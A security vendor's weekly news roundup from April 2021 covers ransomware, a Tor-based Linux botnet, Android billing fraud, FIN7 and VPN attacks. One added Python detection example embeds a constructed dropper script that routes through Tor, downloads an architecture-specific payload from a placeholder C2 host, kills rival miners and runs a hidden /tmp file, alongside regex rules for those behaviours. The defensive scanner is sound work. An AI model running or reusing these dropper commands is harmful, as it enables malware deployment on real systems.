Cyber Threats
This Week in Security News - April 23, 2021
XCSSET Quickly Adapts to Macs and Babuk Ransomware Gang Claims Decryptor Repaired
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, read about why the Babuk ransomware gang posted a message on its website saying it had repaired a defect in the decryptor it provides to victims. Also, learn how XCSSET adapted itself to ARM64 and x86_64 Macs.
Read on:
XCSSET Quickly Adapts to MacOS 11 and M1-Based Macs
XCSSET, which targeted Mac users by infecting Xcode projects, was initially reported as a malware family but is now classified as an ongoing campaign. This blog from Trend Micro details new research regarding XCSSET, including the ways in which it has adapted itself to work on both ARM64 and x86_64 Macs, as well as other notable payload changes.
PR Campaign: Babuk Ransomware Gang Claims Decryptor Repaired
The Babuk ransomware gang launched a public relations campaign, posting a message on its website saying it had repaired a defect in the decryptor it provides to victims who pay the ransom demand. Erin Sindelar, threat researcher at Trend Micro, says ransomware gangs are now more frequently posting messages like this to encourage victims to pay.
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools
In this blog from Trend Micro, learn some of the emerging techniques used by malicious actors targeting Linux systems: routing traffic through Tor via a network of SOCKS5 proxies, abusing legitimate DevOps tools, downloading follow-on malware samples matched to the host's CPU architecture, removing or deactivating competing cryptocurrency miners, and other features that evade detection and analysis.
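The behaviours listed above are the kind of thing a responder can triage for in a recovered shell dropper. The following is an added example, not code from the blog or from Trend Micro's research: a small rule-based scanner that flags a constructed dropper script for the indicators the roundup names (SOCKS5/Tor proxying, architecture-dependent download, killing rival miners, a hidden drop file in /tmp) and stays quiet on a benign installer that merely selects a build by architecture. The sample scripts, the rule names, the regular expressions and the DevOps tool names in the last rule are this example's own assumptions, not signatures published with the research.

```python
import re

# Constructed sample dropper for illustration only. It is not a real sample and
# "$C2" is a placeholder for a command-and-control address, never resolved here.
SAMPLE_DROPPER = """#!/bin/sh
export ALL_PROXY=socks5h://127.0.0.1:9050
ARCH=$(uname -m)
case "$ARCH" in
  x86_64)  PAYLOAD=bot.x86_64 ;;
  aarch64) PAYLOAD=bot.arm64 ;;
  *)       exit 1 ;;
esac
curl --proxy socks5h://127.0.0.1:9050 -s -o /tmp/.cache "$C2/$PAYLOAD"
pkill -9 -f xmrig
pkill -9 -f minerd
chmod +x /tmp/.cache && nohup /tmp/.cache >/dev/null 2>&1 &
"""

# Constructed benign installer: picks a build by architecture but does nothing else
# on the list. Used as a control so the scanner is not just "uname -m is evil".
BENIGN_INSTALLER = """#!/bin/sh
ARCH=$(uname -m)
curl -fsSL -o /usr/local/bin/tool "https://downloads.example/tool-$ARCH"
chmod +x /usr/local/bin/tool
"""

# Heuristic rules (name, pattern). These are assumptions made for this example,
# one per behaviour the roundup describes; tune them before relying on them.
RULES = [
    ("tor_socks5_proxy",
     re.compile(r"socks5h?://|:9050\b|\btor\b", re.IGNORECASE)),
    ("arch_dependent_download",
     re.compile(r"uname\s+-m|\b(x86_64|aarch64|armv7l)\)")),
    ("kills_competing_miner",
     re.compile(r"\b(pkill|killall|kill)\b.*\b(xmrig|minerd|cryptonight)\b",
                re.IGNORECASE)),
    # Assumed set of DevOps/config-management CLIs; the page names none.
    ("devops_tool_invocation",
     re.compile(r"\b(ansible(-playbook)?|salt(-call)?|chef-client|knife)\b")),
    ("hidden_tmp_dropfile",
     re.compile(r"/tmp/\.[A-Za-z0-9_]+")),
]


def scan_script(text):
    """Return {rule_name: [\"lineno: line\", ...]} for every rule that fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(f"{lineno}: {line.strip()}")
    return hits


def verdict(hits, threshold=3):
    """Crude scoring: several distinct behaviours together is what is suspicious,
    any single one of them has legitimate uses."""
    return "suspicious" if len(hits) >= threshold else "benign"


if __name__ == "__main__":
    for label, script in (("dropper", SAMPLE_DROPPER), ("installer", BENIGN_INSTALLER)):
        hits = scan_script(script)
        print(f"{label}: {verdict(hits)}")
        for name, lines in hits.items():
            print(f"  {name}")
            for entry in lines:
                print(f"    {entry}")
```

The threshold-based verdict is deliberate: an architecture check or a SOCKS proxy on its own is normal operations, so the scanner reports a script only when several of the listed behaviours co-occur, which is the pattern the research describes.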
Over 750,000 Users Downloaded New Billing Fraud Apps from Google Play Store
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud, attracting more than 700,000 downloads before they were discovered and removed from the platform. In this article, Trend Micro researchers share how the Joker malware operators are likely profiting from this scheme.
Carbanak and FIN7 Attack Techniques
This week, the results of this year's MITRE Engenuity ATT&CK Evaluations were released, which focused on Carbanak+FIN7. These financially motivated threat groups often enter systems through spear phishing. After gaining a foothold, they abuse the Windows Dynamic Data Exchange (DDE) feature and legitimate cloud-based services to deliver malware or to establish command-and-control communication.
Hackers Pose as Bloomberg Employees in Email Scam
Hackers are impersonating Bloomberg employees to install remote access software on target computers. The ruse seeks to capitalize on the influence of Bloomberg Industry Group, sending fake Bloomberg invoices that are laced with a remote access trojan (RAT) that could be used to surveil computer networks or steal data. The goal of the malicious email campaigns, and exactly who was targeted, remain unclear.
The Storybook Approach to MITRE ATT&CK
In this blog, read Trend Micro’s breakdown of this year’s MITRE Engenuity ATT&CK Evaluations story, which simulates techniques associated with notorious threat groups Carbanak and FIN7 to test solutions' ability to detect and stop APT & Targeted Attacks. Trend Micro’s Vision One platform detected and prevented 90% of attack simulations through automated detection and response very early on in each test.
Hackers Found Leveraging Three SonicWall Zero-Day Vulnerabilities
Attackers that seem to have “intimate knowledge” of the SonicWall Email Security product have been discovered leveraging three zero-day vulnerabilities in the popular enterprise solution. Exploited in conjunction, the flaws allowed the attacker to obtain administrative access and code execution on a SonicWall ES device, then install a backdoor, access files and emails, and move laterally into the victim organization’s network.
Fundamental Security Risks in Robot Languages
Trend Micro analyzed a total of 100 task programs written in the programming languages of eight major vendors in the industrial robot industry to determine the security risks of the language design itself. It found that the programming languages of industrial robots share a design-level security risk: "basic functions of systems can be used unconditionally without any confirmation of permissions".
Attackers Heavily Targeting VPN Vulnerabilities
Attacks on virtual private networks, like those targeting a trio of known vulnerabilities in Pulse Secure appliances, have intensified in recent months along with the increase in remote and hybrid work environments since the outbreak of COVID-19. The trend requires organizations to patch VPN and other externally facing devices as the highest priority.
Connected Car Cybersecurity a Concern for Consumers
Earlier this month, The Hartford Steam Boiler Inspection and Insurance Company (HSB) published a survey report on connected cars. Findings from this survey revealed that U.S. motorists are concerned about possible cyber-attacks on their connected vehicles. Some of the respondents believe that a hacker could access their vehicles and confront them via their car audio systems or disable safety features.
Trend Micro Integrates Partners into AWS Marketplace
Trend Micro has updated its channel program to drive the recruitment of partners with a deep understanding of how Amazon Web Services infrastructure is configured. In this article, Louise McEvoy, vice president of U.S. channels, shares what the updates to the program mean for partners.
What are your thoughts on ransomware gangs posting messages to victims? Share in the comments below or follow me on Twitter to continue the conversation: @JonLClay.